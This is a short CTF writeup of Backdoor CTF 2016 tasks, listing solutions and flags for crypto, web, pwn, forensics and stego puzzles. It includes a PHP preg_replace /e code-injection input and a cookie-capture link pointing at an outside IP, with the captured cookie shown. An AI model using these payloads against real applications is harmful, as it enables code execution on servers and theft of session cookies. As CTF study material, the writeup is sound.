Backdoor CTF 2016 Writeup

Hello,

This is a quick and dirty writeup for Backdoor CTF 2016 tasks.

I played with my colleague Chaker within our team SpectriX which finished #13 in this CTF.

Parts of this writeup are shared between us.

COLLISION COURSE – Crypto 350

WIRED-AUTH – Web 200

The /e modifier in preg_replace() is deprecated
I just tell the auth script that the match text should be evalued as code after performing the replacement
password = “/.\b/e”
key = “p(\$f)”

This will ouput
PHP Notice: Undefined variable: fields_string in /root/backdoor/submit.php on line 9
4lw4y5_74k3_c4r3_wh1l3_u51n6_pr36_r3pl4c3_07h3rw153_v4mp1r3_5h4ll_f1nd_y0u!You must enter the correct password to get the flag!<br />daf88b

The flag is 4lw4y5_74k3_c4r3_wh1l3_u51n6_pr36_r3pl4c3_07h3rw153_v4mp1r3_5h4ll_f1nd_y0u!

 

WORST-PWN-EVER – Pwn 100

It is a pyjail task
get the name of the running script

read its content

 

Nothing special
List env variables

{‘SHLVL’: ‘1’, ‘HOSTNAME’: ‘9da6525eaa81’, ‘PWD’: ‘/scripts’, ‘_F_L_A_G_’: “‘SHA256(w3_mu57_d357r0y_7h3_3nv10rnm3n7_70_637_r1d_0f_n00b5)'”, ‘HOME’: ‘/root’, ‘PATH’: ‘/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin’, ‘_’: ‘./shell.py’}

flag: w3_mu57_d357r0y_7h3_3nv10rnm3n7_70_637_r1d_0f_n00b5

MINBLOWN – Crypto 150

PBKDF2 collision with HMAC-SHA1.

e6~n22k81<[p”k5hhV6*
username = chintu
password = e6~n22k81<[p”k5hhV6*
flag{e8399e111069943641f1c215a3635ec709ff5ca9543d73365a6594fdce92b6bd}

ISOLVE – PPC 200

Flag: 56490776814fdd91c81309b95fd11dbc8750a6a7f275e712550db6c34a901c62

BUSYBEE – Forensic 150

2 busybox copies one renamed to “[” and the other to “cat”
I renamed them to busybox1 and busybox2
One infected busybox binary
2 busy box binaries
just diff them

 

64454,64458c64454
< 00fbc50: 0000 0000 0000 000a 0a0a 0a54 4849 5320 ………..THIS
< 00fbc60: 4953 2057 4841 5420 594f 5520 4152 4520 IS WHAT YOU ARE
< 00fbc70: 4c4f 4f4b 494e 4720 464f 523a 2020 2020 LOOKING FOR:
< 00fbc80: 306e 335f 6e30 3062 5f72 7531 6e35 5f30 0n3_n00b_ru1n5_0
< 00fbc90: 6e33 5f68 756e 6472 3364 5f70 7230 3500 n3_hundr3d_pr05.

flag 0n3_n00b_ru1n5_0n3_hundr3d_pr05

DTUNE – Misc 70

Just read the DTMF tones and replace the mobile phone key codes with the corresponding letter (T9 Cipher)
THE FLAG IS SHA256 OF EPCDHXHMCAQW

IMAGESOLVER – Web 70

Submit the http://164.132.103.207/cookie.php link
Content of r.txt
Cookie: flag=e30524a77d014c2cba94e9f0c04e01e0c083a7388a16d3fc60f8d9c731dc8ac9 <br />
host: 164.132.103.207 <br />
Connection: close <br />
Flag is e30524a77d014c2cba94e9f0c04e01e0c083a7388a16d3fc60f8d9c731dc8ac9

DEBUG – Rev 30

Can be solved statically

Flag is i_has_debugger_skill

LOSELESS – Stego 100

Calculate the diff between the encrypted and the original picture

This gives a 49×7 matrix

1110111101101110001101101110110110110011010111001
0111111111110001111111111111011011111111111101111
1000000000101001111010010101111101011010100110111
0100010001000100001000000010100100000100010011011
1010110100000000110101100111110110011110111110111
0000100100101001011001101001100110100010011010110
0010001101101010101010011101100100111011101011111

Each column corresponds to one char of the flag
d1ff1cul7_t0_f0cu5,wa5n’t_i7?

 

That’s all 🙂

Leave a Reply

Your email address will not be published. Required fields are marked *